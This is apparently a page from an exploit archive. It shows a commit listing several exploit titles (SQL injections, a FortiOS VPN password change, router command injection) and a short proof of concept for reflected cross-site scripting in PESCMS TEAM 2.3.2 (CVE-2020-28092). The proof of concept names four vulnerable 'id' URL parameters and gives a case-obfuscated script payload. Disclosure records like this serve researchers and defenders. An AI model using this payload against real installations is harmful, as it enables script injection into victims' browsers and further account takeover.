21fa83f241
12 changes to exploits/shellcodes Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC) Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Joomla! Component com_memorix - SQL Injection Joomla! Component com_informations - SQL Injection Joomla! Component com_memorix - SQL Injection Joomla! Component com_informations - SQL Injection PESCMS TEAM 2.3.2 - Multiple Reflected XSS Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification xuucms 3 - 'keywords' SQL Injection Gitlab 12.9.0 - Arbitrary File Read (Authenticated) TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution TestBox CFML Test Framework 4.1.0 - Directory Traversal Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection M/Monit 3.7.4 - Privilege Escalation M/Monit 3.7.4 - Password Disclosure Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
17 lines
No EOL
591 B
Text
17 lines
No EOL
591 B
Text
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
|
|
# Date: 2020-11-18
|
|
# Exploit Author: icekam
|
|
# Vendor Homepage: https://www.pescms.com/
|
|
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
|
|
# Version: PESCMS Team 2.3.2
|
|
# CVE: CVE-2020-28092
|
|
|
|
PESCMS Team 2.3.2 has multiple reflected XSS via the id
|
|
|
|
parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=
|
|
|
|
please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6
|
|
|
|
now I input payload :
|
|
|
|
"><ScRiPt>alert(1)</ScRiPt> |